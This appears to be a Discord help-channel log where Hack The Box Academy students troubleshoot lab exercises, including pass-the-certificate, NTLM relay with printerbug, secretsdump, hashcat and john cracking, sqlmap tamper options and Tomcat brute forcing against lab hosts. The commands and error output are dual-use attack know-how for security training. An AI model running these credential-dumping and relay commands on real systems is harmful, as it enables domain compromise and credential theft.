python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ -pfx-base64 <Base64PFXString> dc01.ccache

#

This indicates that the TGT request succeeded.

However, when I try a similar process on my own lab/environment, it fails and I get errors or no TGT is issued.

#

"KDC has no support for PADATA type (pre-authentication data)"

fathom pendant
#

Sounds like an issue with the kdc not accepting pre-auth stuff

main valley
#

can we use mobaxterm to SSH into the boxes to answer questions in the module?

gray yacht
vapid maple
#

Hello Everyone. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp

novel parrot
#

you are on the right track, just try and take a look at the limited file uploads section again

long igloo
fathom pendant
long igloo
#

Yeah, I ended up using CuPP and it's not even working with that and it applies all that modifications

#

That's why I'm asking for help, I can throw all my process in case u find an issue on it or smth

fathom pendant
#

Just a simple base list, and a simple custom.rule based on a few basic rules

long igloo
fathom pendant
#

I.e. adding special characters at the end

#

Or adding full stuff at the end such as a year

slender delta
#

Quick question (and please tag me in the response): how can i revisit the content of a finished module in case I have forgotten to take notes/improve my notes of said module?

fathom pendant
fathom pendant
indigo gate
#

Hey, new to pentesting. Having trouble connecting to redis-cli. Any reason my VM cannot connect to it?

Starting Point, Redeemer

long igloo
#

im struggling fr with this ffs

fathom pendant
long igloo
#

im using best64.rule

fathom pendant
#

Don't use a pre-made rule

long igloo
#

alrighty ill try

fathom pendant
#

It'll likely miss the exact thing needed

#

The hint button for the question is helpful to think of an additional rule or two to add

novel parrot
#

hey btw marcielee

#

doing server side skill assesment, im tryna get a connection to my machine but it dosent connect, am i on the wrong track or am i doing it incorrectly?

vast lion
#

Hello

fathom pendant
novel parrot
#

"Server-side Attacks "

#

oh well il try n see, ty!

long igloo
fathom pendant
long igloo
#

like, if my .list looks like
zaiden
marcie
lee

it generates

zaidenmarcie
marcielee
zaidenlee

and so

#

alrighty

fathom pendant
#

Just make sure to capitalize the first letter of each word

dark hedge
novel parrot
#

taking cbbh soon, so yeah

#

im doing only skill assessments again

dark hedge
#

then you should know the answer to your question

novel parrot
#

its been a while

#

got it now though

fathom pendant
dark hedge
#

make writeups for every exercise

long igloo
full wagon
vapid maple
#

If someone could DM me. I really could use some help. Im working on https://academy.hackthebox.com/module/136/section/1291 File Upload Attacks, Limited File Uploads. I think Ive figured out how to upload the malicious SVG, but I cant figure out how to view any output. Any help would be great! Im still trying to figure out Burp

fathom pendant
vapid maple
#

the only response Im seeing is "File successfully uploaded"

#

I used dirsearch and found where the files are being uploaded to, and there isnt any useable output

fathom pendant
#

I just recall following the examples and it working as expected

fresh estuary
#

can anyone please help me out: i am stuck on a sqli injection.
when I go to the URL: http://ip/index.php?id=' I get a sql error, so it is injectable. But the description says: Security is not a joke, and filtering is serious business.
So I guessed I needed to do some filtering, and It appears that the server removes spaces. Been trying to exploit this for hours with sqlmap but no luck.
Anyone can help me? Tried commands like: sqlmap --flush-session -u "http://ip/index.php?id=4" -p id --batch --random-agent --level=5 --risk=3 --dbms=mysql --tamper=space2comment,randomcase,between --technique=BEUT --time-sec=8

rustic sage
#

Hello

full wagon
rustic sage
#

Why I can't message in general I have a I need help

fathom pendant
rustic sage
#

So I need to make a account In that site ?

fathom pendant
#

@rustic sage we don't do that kind of hacking here.

rustic sage
#

No it's not hack

fathom pendant
#

Well we don't do anything with Whatsapp

#

Also you don't have image permissions to send videos/images

rustic sage
#

Oh okay bro is there a place that I can get help from ?

fathom pendant
#

This isn't a troubleshooting server. And this channel is specifically for help with the htb academy learning modules

rustic sage
#

Okay bro sorry for bothering you

fathom pendant
opal cape
#

Hey what would you guys do to find the default credit of prtg if u know the username prtgadmin, instead of just manually guessing the password

cloud urchin
#

creds app is good too

steep forum
candid vine
#

guys, it's normal? i tried three different ways to connect using xfreerdp and i can't. but the machine receive my pings.
"Kerberoasting - from Windows (Module)"

candid vine
#

oh, you are a gentleman... works now

gray yacht
steep forum
gray yacht
novel parrot
#

could anyone help me out on Web Attacks skill assesment

#

i found the IDOR but i cant do anything with it that i know off

wild sage
novel parrot
#

i cant find anything

magic mango
#

who or where do i need to go about having issues with modules not loading?

faint rampart
#

<@&861185840277487616> ban the account mods?

novel parrot
#

do i need to ping seriousrulebreakagain?

magic mango
#

HAH!

slate zinc
#

what happened guys

novel parrot
magic mango
#

dude just tried to scam me

novel parrot
#

pinged SRB a while ago and someone deleted the msg, i thought it was a mod

#

apperantly not

faint rampart
novel parrot
#

just check deleted msgs log

cloud urchin
#

He's banned

novel parrot
#

alr

slate zinc
#

thanks

candid vine
novel parrot
#

i thought a mod had deleted his msgs thats why i deleted the previous SRB ping i did

novel parrot
wild sage
novel parrot
#

i think i have an idea though

magic mango
#

But seriously tho, i'm having issues trying to launch a pwn-box

#

who or where should i turn to?

cloud urchin
magic mango
#

rgr rgr

wild sage
#

Have you tried changing the VPN server?

magic mango
cloud urchin
#

changing regions may help too

magic mango
novel parrot
faint rampart
novel parrot
#

good hint, but i tried all requests methods alr

#

i cant find the missing parameter

faint rampart
cloud urchin
#

please do not reveal details of skill assessments

novel parrot
cloud urchin
#

take it to DM if you feel you need to reveal info. anyone who has done these doesn't need exact answers like that they already know the answer.

novel parrot
#

i dont want info

#

i did this 2 years ago i forget a lot

cloud urchin
#

i understand but you don't need to reveal things from the assessment to ask a question

wild sage
#

I sent a DM

true finch
#

Can I dm someone on “credential hunting in network shares"?

austere viper
#

Can I ask a question here if I’m stuck on a question?

fathom pendant
#

so long as your question doesn't contain a bunch of spoilers for the module/section

austere viper
#

The question doesn’t: The question is “How many total packages are installed on the target system?”

I used apt and we to count them but keep getting the wrong answer. Am I misunderstanding the question?

#

wc *

waxen totem
# austere viper wc *

Did you take into account that not all lines outputted by apt is an installed package? some lines could be headers

austere viper
#

i did not take that into account, but furthermore, i didnt see anything at all on the page that even mentions packages, so im spinning my wheels

waxen totem
#

That's illegal, please read #rules

fathom pendant
#

also make sure you're ssh into the target when doing this exercise

austere viper
fathom pendant
austere viper
#

im going through man pages now

fathom pendant
#

so you can see the top 10 lines are

austere viper
#

ah ok that makes sense

fathom pendant
#

the warning message that apt gives you is part of stderr, not stdout, so it's not being counted

brave scroll
#

Attacking Common Services - Easy

Just Repeating the Modules:
The Target SMTP service goes offline after some minutes(confirmed this by scan).. have tried SMTP User enum with other methods as well

fathom pendant
#

also changing the timing is useful.

#

The module is aboove tier 0 so avoid sharing spoilers

brave scroll
fathom pendant
#

the smtp service can be slow to respond, increasing the wait time can be useful

fierce sable
#

Needed Help in Password Attack Pass the Certificate

I got

impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[
] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[
] Cleaning up...

instead of getting NTDS.Dit secrects and dont know why

brave scroll
#

have u export db.cache?

#

have u exported db.cache?

fierce sable
#

yes I export the cache

In the initial step instead of getting ./DC01$.pfx file I got the base64

does it mght be a problem

#

but somehow i converted it to .pfx

#

openssl pkcs12 -export -out DC01$.pfx -inkey dc01.pem -in dc01.pem -passout pass:

fathom pendant
fierce sable
#

Then how can i get the certificate

brave scroll
fathom pendant
#

the ntlmrelayx command then the printerbug command

#

just gotta keep the ntlmrelayx command running

brave scroll
fathom pendant
#

after that it should be trivial to save the ccache file and follow from there

fierce sable
fathom pendant
#

it shouldn't give you base64, the output you get from ntlmrelayx should tell you the file is saved as 'DC01\$.pfx'

fierce sable
# brave scroll Remember make sure to `export KRB5CCNAME=/tmp/dc.ccache ` outside of python env

I tried outside of python env but it gives me

impacket-secretsdump -k -no-pass -dc-ip 10.129.64.94 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
[*] Cleaning up...

fathom pendant
#

pre-auth invalid
that means your ccache file isn't proper

fierce sable
fathom pendant
#

again it should be saving to a file, not sure why you're getting base64

simple socket
#

hello has anyone completed " "XPath - Blind Exploitation""

#

thanks

fathom pendant
#

if you do ls in the directory you launched ntlmerelayx from do you see a DC01$.pfx?

fierce sable
fast prism
waxen totem
steep forum
fierce sable
fathom pendant
#

i'm curious what your command was for ntlmrelayx that got you the b64 output 🤔

#

instead of it saving to a file

steep forum
fathom pendant
#

it's just how kerberos does things

steep forum
fathom pendant
#

not entirely sure with linux domain joined machines but for kerberos it looks for both the FQDN and shortname

steep forum
fierce sable
#

thats my command

fathom pendant
#

i didn't use sudo to run ntlmrelayx

steep forum
#

^^

fierce sable
fathom pendant
#

hmm may be your environment then

steep forum
#

Just tested it, does not require admin permissions. That is very strange.

fierce sable
vast wind
#

I can’t figure out how to access the admin login on nibbles

astral vine
#

Hey for anybody doing CBBH want to have a study partner? I’m pretty far into it and to be honest looking for someone else who isn’t a complete nub, but also struggling by themselves because their brain doesn’t do web very well like mine

fathom pendant
astral vine
#

Also looking for any mentors out there that might want to help a brother out

#

For CBBH that already have it

steep forum
astral vine
#

Not really it’s specifically for the modules

#

Or this only for help?

#

I may be confused on that as I haven’t used this section of the discord so my apologies if so

fathom pendant
#

this channel is really only for help with the modules, not asking for study buddies

astral vine
#

Gotcha would CBBH be more appropriate?

fathom pendant
#

and even then study groups tend to not work out too well for this kinda thing due to it being a self-paced course

astral vine
waxen totem
#

That's illegal, can't help you, go talk to her about it or if you think it's needed go contact law enforcement

uncut crystal
#

Hi

radiant osprey
cloud urchin
waxen totem
uncut crystal
#

Wt I want read here to access genaral?

storm elk
uncut crystal
storm elk
#

Didn’t follow the instructions then

#

Clicking and scrolling won’t do the trick. You gotta actually read and do as you’re told

uncut crystal
#

I want give my token

storm elk
#

No. You do as you’re told in the instructions. Ain’t nobody here gonna be able to do it for you

fathom pendant
#

@fierce sable don't dm without asking first

scenic current
#

Has anyone completed the final assessment for LLM Output Attacks? I have what seems like a reasonable payload but haven't been able to get it to work in places where I thought it might work. I could really use some advice! Thanks much!

signal hound
#

Hi GUYS, anyone knows a guide on certipy covering all kinds of ESC attacks?

autumn pilot
#

The documentation of the tool

fathom pendant
native crow
#

IF Juicy potato / printspoofer binaries dont launch , don't even get syntax etc even though a system is vulnerable , anyone have a good idea of where to go from there? all flags CLID etc are fine, don't even get an error

royal bay
#

025/06/24 06:51:28 server: session#1: tun: conn#1: Close [0/7] (error Failed to handle request: read tcp 172.16.5.129:54834->172.16.5.19:3389: read: connection reset by peer)

wary wren
#

Hey i am doing AD enumeration and attack skill assesment II i am stuck in question to get flag.txt of MS01 i got creds but i dont seem to able to connect to it using evilwinrm or xfreerdp when ports are open

#

Submit the contents of the C:\flag.txt file on MS01.

steep forum
vague cedar
#

@fierce sable did you do the "pass the certificate" lab? I'm getting the same problem

ancient parrot
thin citrus
#

I am working on 'Parameter Logic Bugs - PoC and Patching - Validation Logic Disparity'.
Here I followed the flow by sending a basic request through RapidAPI to 'http://localhost:5000/api/exams/availability'

{
    "id": 1,
    "startDate": "2025-06-24T15:47:14.843Z",
    "endDate": "2025-07-24T15:47:14.843Z"
}

Got error:
{
"unavailableSlots": []
}

But in the front-end I see available slots from 2025-06-24 up to 2025-07-24, so why not through RapidAPI?
The function should returns a list of unavailable dates but it does not. 'unavailableSlots' is empty.

Then I followed the 'Validation Logic Disparity' vulnerabilite steps
I set a breakpoint (line 166) right after the line where userId is set, and then send a request to the endpoint.
Then I did right-click on the userId variable and select Add to Watch

The I send a POST request to /api/exams/book with the same id/date body data we saw in the previous section.
{
"id": 1,
"date": "2025-07-24T15:47:14.843Z"
}

But at this endpoint it requires authentication, So I added the to the request, which we can copy from the storage tab in the Browser Dev Tools under Local Storage.
Then we can click on the token and select Copy Row or copy.
Authorization: Bearer <token>

Only this section I don't understand? I can not delete the 'token' word in RapidAPI but only in 'Dev Tools under Local Storage'
Then, in the RapidAPI request, we add it in the Auth tab with the Bearer option "make sure you delete the token word when you paste the value".

#

Can someone help me with this and also the patch that is provided did not work from the section 'PoC and Patching - Validation Logic Disparity'.

#

where to delete the word 'token'?

leaden island
#

yo guys im on attacking AD

#

LLMNR/NBT-NS Poisoning - from Linux

#

im supposed to use responder to listen and send poisoned answers to services

#

and capture the ntlmv2 authentication request

#

however this hash cant be cracked with rockyou list

#

which, i think it should

#

also tried other wordlists, tried cracking with hashcat and john too

#

this is my setup

#
└─$ john/run/john --format=Netntlmv2 --wordlist=/opt/wordlists/rockyou.txt temphash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:08 DONE (2025-06-24 11:16) 0g/s 1609Kp/s 1609Kc/s 1609KC/s !)(OPPQR..CjDC2x[U
Session completed. 

#

hashcat -m 5600 temphash /opt/wordlists/rockyou.txt

#
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BACKUPAGENT::INLANEFREIGHT:a1837c1bd036e5b2:85db804...bbe4db
Time.Started.....: Tue Jun 24 11:36:11 2025 (12 secs)
Time.Estimated...: Tue Jun 24 11:36:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1142.8 kH/s (1.17ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344386/14344386 (100.00%)
Rejected.........: 0/14344386 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....:  kristenanne -> CjDC2x[U
Hardware.Mon.#1..: Temp: 60c Util: 76%

Started: Tue Jun 24 11:36:10 2025
Stopped: Tue Jun 24 11:36:25 2025
#

idk what im missing here

radiant osprey
#

Somebody can help me to get back my mess?

autumn pilot
#

Check whether you have new lines in the file

leaden island
vague cedar
# ancient parrot i did, it smoothly, what's your problem?

when i run -
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator '10.129.234.174/DC01$'@DC01.INLANEFREIGHT.LOCAL
I keep getting this error-
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[
] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[
] Cleaning up...

spring island
#

doing brute force module, the pin python script it's so mean making the pin not in the low number range... running for 20 mins on pwnbox and only up to 2820, or am i meant to ignore script and use burp but even thats slow on free edition

celest peak
vague cedar
#

Yea i did that first

#

It was giving the same error

celest peak
#

I'll boot up the lab, one moment, we can go to DM

vague cedar
valid finch
#

Anyone done Intro to Whitebox Pentesting? How's the 2nd question of Skill Asssessment expecting us to throw an exception in NodeJS correctly? I've been trying to make it throw an error then exit, make it exit without throwing error, make it exit while loggin info, none works. Every method just shows patch failed. Why is the question so vague?
I can confirm it works correctly by testing locally with different inputs

sacred rock
steep forum
celest peak
sturdy ivy
#

Just finished the SQLi module. That skills assessment was super fun.
Can't wait to do SQLmap module and automate some stuff though, my lord

young gale
celest peak
#

The newest iteration of impacket-ntlmrelayx outputs the certificate in base64, but it can just be converted with base64 -d to pfx file

fathom pendant
#

oof lol

rapid lichen
#

Hey all. I'm working through the "NTLM Relay Attacks" module and am stuck at the Skills Assessment Q2. I've had a read online (https://forum.hackthebox.com/t/ntlm-relay-attacks-skills-assessment-question-2/303433/7) and searched HTB Discord. It appears that I should be trying the ESC attacks and have followed the steps but when attempting to run printerbug,pu, I'm getting the following error: "SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)". The printerbug.py command I'm using is: python3 tools/krbrelayx/printerbug.py inlanefreight/plaintext$:'password123!'@172.16.119.70 172.16.119.20 where 172.16.119.70 is the target (backup01) and 172.16.119.20 is the listener (attack box). I'm using the pwnbox. Any pointers as I'm pulling my hair out!

fathom pendant
celest peak
#

For me it's 0.11.0, I installed apt packages: python3-impacket impacket-examples

#

So it's not the newest iteration then, I assumed wrong 😄

#

when I installed with pip there were some errors regarding the ntlmrelayx component, it wanted an argument in the rpc function but there was no flag to set it and it was missing in the ntlmrelayx.py file itself

fathom pendant
#

yeah the apt version may be behind the python repository version

steep forum
celest peak
#

I'll have to demo a newer version on another machine, I just spent an hour trying to fix the toolset

#

I plan on taking the exam soon, so I cannot afford taking extra risks 😄

steep forum
#

Make sure you have everything set up. Use the pwnbox if there are issues, good luck!

celest peak
#

Will do, thanks!

#

I'll most likely do another blind run on the AEN and make a mock report

#

Can confirm that with 0.12 it creates a file

#

My original issue with the pip packet was that it requires sudo rights to run ntlmrelayx as it binds to a lower port, so I installed it with user and root seperately, because running as sudo the packet wouldn't be found even if it was in path

#

I also noticed that python version was missing GetUserSPNs.py, just a heads up if someone is using it

fathom pendant
#

@sleek surge to be clear you're on the Knowledge Check section?

sleek surge
#

yes I am

fathom pendant
#

don't reveal spoiler information for modules.

rain mirage
#

sry i did not know

fathom pendant
#

the nmap module tells you that sometimes you need to connect to a port via netcat to get more information

rain mirage
#

can u help me with that

#

i tryed getting the banner but it did not print out any thing

fathom pendant
#

also as noted by the info message at the top -sT is incompatible with -g (--source-port) option

#

you need to use -sS

rain mirage
fathom pendant
#

yeah meaning that you'll need another method to gain information

#

nmap isn't a one-stop shop

rain mirage
#

nc?

#

im missing something,,

fathom pendant
#

yes nc

sick depot
#

anyone keep getting this error on windows server section of win priv esc

fathom pendant
#

with nc, -p is the source port option

sick depot
#

Exploit failed: Errno::EACCES Permission denied - bind(2) for 10.10.15.166:445
Interrupt: use the 'exit' command to quit]

fathom pendant
#

permission denied

#

you need to run the exploit tool with sudo

#

as 445 is a reserved port (<1024)

rain mirage
#

let me retry wait

fathom pendant
#

remember source port is the port from your system being used to connect

#

when connecting to a remote resource the syntax is typically nc ip port

sick depot
fathom pendant
#

v0.11.0

#

the pwnbox uses v0.12.0

rain mirage
fathom pendant
#

you know the target port you want to connect to

#

you also need to specify the source port as well

#

with -p

rain mirage
#

okkkk

fierce sable
rapid lichen
fathom pendant
#

that error is expected, check your ntlmrelayx output

grizzled schooner
#

Just continuously says attacking and then times out

fierce sable
#

for this you simply swap the ip for printer bug and ntlmrelayx

fathom pendant
#

also @grizzled schooner don't share passwords/info/spoilers 😉

grizzled schooner
#

Oh sorry, didn't realize it was still in there, my bad!

flint palm
#

guys who has solved logrotate in linux priv escalation?

pulsar needle
#

Guys, I am on module/113/section/1090 for the Tomcat Discovery. I am not sure how to figure out the answer of the 2nd question "What role does the admin user have in the configuration example?" Because I cannot seem to access or know how to access the tomcat-users.xml configuration file.

fathom pendant
#

try restarting the ntlmrelayx command @grizzled schooner

grizzled schooner
#

On my 2nd restart for ntlmrelayx and the machine(s) in general --> was happening last night as well

fathom pendant
fathom pendant
#

as in, what's in the reading

pulsar needle
grizzled schooner
#

I'll let it run a bit longer, and see if it'll work this time around

pulsar needle
fathom pendant
fathom pendant
pulsar needle
#

I appreciate it, thank you!

fathom pendant
#

be mindful that whenever a question asks for something from the example -> it's from the reading and not from the target

pulsar needle
#

I will pay more attention next time

grizzled schooner
flint palm
#

Guys hello who has done Logrotate from Linux Priv Escalation

fathom pendant
grizzled schooner
#

yeah

fathom pendant
grizzled schooner
#

I have from the reading

python3 printerbug.py <targetdomain>/user:"password"@DC01 <my ip>

flint palm
fathom pendant
#

logrotten does work; it just takes a little coercion to make the file rotate for the logrotten payload

rain mirage
#

sudo nc 10.129.2.47 <port> -p 53
Can't grab 0.0.0.0:53 with bind
does this mean that my port 53 is being used? and if yes can i use 1053?

flint palm
#

I created payload anyway found logs and transferred logrotten but when I start it, it tells me logrotten is a directory

#

when start from directory tells me there is no such file

#

will return to it later

fathom pendant
fathom pendant
#

@west arrow please don't reveal module content. The best way to figure out what's breaking is to see where the payload is inserted

grizzled schooner
#

So after it hit SMBD-Thread-12 it timed out for ntlmxrelayx --> re-ran printerbug.py as root and ntlmrelayx with sudo, and I'm getting the same thing

Can anyone give me a nudge?

fathom pendant
west arrow
grizzled schooner
fathom pendant
fathom pendant
#

(then you just need to swap them out for the spawned target servers)

grizzled schooner
#

so ntlmrelayx is ca and printerbug to dc01?

fathom pendant
#

yep

sweet jewel
#

dfscoerce

#

coercer

#

petitpotam

fathom pendant
#

you relay the request to the certificate server to your attack system

fathom pendant
#

certipy, funnily enough, has a relay option lol

pulsar needle
#

Guys, I am on Attacking Common Services > Tomcat Exploiting
On the question "Perform a login bruteforcing attack against Tomcat manager at http://web01.inlanefreight.local:8180. What is the valid username?"
I have attempted using the metasploit module and set rhost rport and vhost as well but none of the username/password combinations are correct from the default dictionary.

grizzled schooner
#

Is something wrong with my ntlmrelayx?

Exception in thread Thread-6: Traceback (most recent call last): File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner self.run() File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 38, in run ADCSAttack._run(self) File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run certificate_store = self.generate_pfx(key, certificate) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx p12 = crypto.PKCS12() ^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__ obj = getattr(self._module, attr) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

lol

#

it generated and then popped this but I don't know enough about what this is saying to understand it

fathom pendant
#

sounds like your openssl is bugged out

rain mirage
#

thx @fathom pendant

#

i got the flag

fathom pendant
#

sudo apt install --fix-broken python3-openssl maybe??

grizzled schooner
# fathom pendant `sudo apt install --fix-broken python3-openssl` maybe??

did that and then

*] Generating CSR... [*] CSR generated! [*] Getting certificate... [-] Authenticating against http://10.129.234.172 as / FAILED [*] All targets processed! [*] SMBD-Thread-8 (process_request_thread): Connection from 10.129.234.174 controlled, but there are no more targets left! [*] GOT CERTIFICATE! ID 14 Exception in thread Thread-6: Traceback (most recent call last): File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner self.run() File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 38, in run ADCSAttack._run(self) File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run certificate_store = self.generate_pfx(key, certificate) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx p12 = crypto.PKCS12() ^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__ obj = getattr(self._module, attr) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

fathom pendant
grizzled schooner
#

Do I have to downgrade then?

#

I'm at work and can't get to github lol

pulsar needle
#

Q1 / I tried both metasploit module and the python script with the wordlists mentioned in the module (Attacking Common Services >> Attacking Tomcat) but neither worked and I couldn't find any valid cred combos.

misty current
#

Nvm, it's the Attacking Common Application module not the Common Service

fathom pendant
#

it's the common applications module, not common services

misty current
#

Yeah

fathom pendant
#

but they did write common services module in their ask

#

so that will lead to confusion

fathom pendant
#

@tepid bronze you'll need to regenerate your account token also #bot-commands is the place to do your verification, not here

coral gull
#

Thanks

topaz lantern
#

Who is certified hacker here?

dark hedge
#

plenty of users

#

including myself

dark bough
#

hello i'm new to the server but i do not have access to htb off topic channels, any ideas why?

dark hedge
flint palm
#

/logrotten -p /home/htb-student/backups/access.log.1
-bash: ./logrotten: Is a directory
can someone tell me why I am getting this output?

dark hedge
#

because ./logrotten is a directory and not a file

pulsar needle
reef thorn
#

someone help me with the brute forcing module, it should be easy but I am just not getting it

pulsar needle
#

I am sorry it is the Attacking Common "Applications"

reef thorn
#

the pure brute forcing I wrote my scripts in java and it was painfully slow, so slow that it would not run the 10000 pins from 0000 to 9999 before the machine stopped so I decided to move on. Later now I use the exact hydra command I need to and I even used the 1000 and 10000 dictionaries but I am getting 0 hits for this. I am really frustated and I do not know what I am doing wrong.

celest peak
flint palm
reef thorn
#

Similarly for the dictionary attacks section I tried using hydra as well and it kept telling me that the server uses Http AUth and not a form so to use get method and I tried that as well and yet 0 matches,

celest peak
pulsar needle
#

Wait how did it just work on Metasploit? And not on the python script? I had to run it like 5 times for it to work on metasploit?

celest peak
#

Maybe the machine wasn't properly spawned yet

pulsar needle
coral gull
#

Thanks

dark hedge
pulsar needle
celest peak
#

Try changing the -P parameter to /manager

pulsar needle
celest peak
flint palm
#

I made a payload and all other stuff but still not working

#

and can't find anything about this logrotten

celest peak
flint palm
#

I missed a dot

#

in the original version yes there is a dot

celest peak
#

Does the exploit run?

flint palm
#

no

coral gull
#

I get some challenge bi oo

celest peak
flint palm
#

yes

fierce sable
#

help Password attack : pass the certificate

sudo evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'

Error: Exiting with code 1

flint palm
#

I downloaded it on my attack machine and transferred to the target cause you are not allowed to download it on target machine

celest peak
#

DM me

warped onyx
#

Moin

#

Anyone from Germany

mighty valve
#

hey guys, can anyone help me with the intro to assembly skills assessment, i've been stuck for a week now

true finch
#

I'm stuck on question 2 on credential hunting in network shares. Can someone assist?

mighty valve
reef thorn
#

hmm whats the problem? I will try to help

mighty valve
reef thorn
#

sure

fathom pendant
fathom pendant
gloomy grail
#

Hello I need help for the exercise HTTP Response Splitting.
I have the xss but I dont understand how to trigger the admin on it.

Can someone DM me pls?

scenic current
#

I need help on LLM Output Attacks. Been stuck on the final assessment, I'm pretty sure I'm 90% there but am really struggling with the last bit. Does anyone have advice?

dark hedge
#

lol. you, and only you 🫵 may DM me

gloomy grail
#

I asked even yesterday, if no one can help me here can you give me some alternatives?

warped onyx
fathom pendant
fathom pendant
#

doesn't work isn't descriptive

dark hedge
warped onyx
#

It's there all the time, look at modules 😂,I'm currently writing in modules 😂

dark hedge
#

just read the message i linked.

fathom pendant
#

the actual instructions is a list of 3 steps in order to link your account, Calc kindly pointed to the direct message that contains the instructions explicitly

steep forum
#

This is the wrong channel for this.

dark hedge
paper kelp
#

I don't have access

warped onyx
#

I have no access

steep forum
#

#welcome @warped onyx You have to verify.

paper kelp
#

Which channel used to find team ?

dark hedge
paper kelp
#

Oh okay thanks

steep forum
grizzled schooner
#

I decided to run updates first thinking maybe it was outdated... had like 2000 packages to update lol

#

Will downgrade if that doesn't work I guess

steep forum
#

Yeah, those versions fixed it for me.

grizzled schooner
#

upgraded or downgraded?

tacit adder
#

hi, help me please
I'm having trouble doing the web proxy lab in the Repeated Requests section, I tried looking for another flag, but I still can't find it anywhere, when I see the hint is "It's not in the same directory!", I went outside the HTML folder to look for it, but I still can't find it

junior fjord
#

I have answer but while I am aligning them ( 3 names ) it's not accepting......

Please someone tell me the correct order, by reading this format I don't able to find correct order to give me answer only

Please help 🙏

foggy talon
#

👀

teal patrol
#

Everytime I try to spwwn the machine for the FTP module, it says that there is already an instance and it doesn't let me proceed with the tasks, can anyone help me?

sterile robin
#

Hello

true finch
ivory flame
#

Hey guys, I have a question. I'm currently doing the Footprinting module's easy lab and when I try to "get" the id_rsa, the ftp program seems to stuck. Does anyone have the same problem?

#

Been stuck at this for 10 mins straight

ivory flame
cloud urchin
neat crest
#

Module : Introduction To Splunk & SPL, first question. this gives me the name of 1 user but its apparently wrong, can someone push me into the right direction?

pulsar needle
#

I am not sure what this script is doing, is it like going to execute what is inside the "cmd.text"?

misty current
pulsar needle
grizzled schooner
#

I'm a bit lost

Passing the Certificate

Got the NTLM hash from the admin account after using ||gettgtpkinit|| I'm just so confused on where to go from here... The module just kind of ended there and moved on to Shadow Credentials... Anyone got any nudges? please @ with responses

grizzled schooner
#

The last few times I've had that happened, I've logged out and back in and it's worked ok for me

gray stratus
#

Do you know if anyone passed the CPTS exam after the update?

teal patrol
worldly ivy
#

Hello everyone! I need someone to tell me I'm not crazy. I'm on the first question of the Hypertext Transfer Protocol, and I've downloaded the /download.php file (using "curl -O IP:PORT/download.php"), and used -i to display the file. So far so good, the filename of the downloaded file is apparently ||"flag.txt"||. I submit this. And I'm told it's wrong. Is hackthebox tripping or am I?!

gray stratus
scenic current
worldly ivy
# scenic current Most of the time I find a flag this specific on HTB and still get an error on, i...

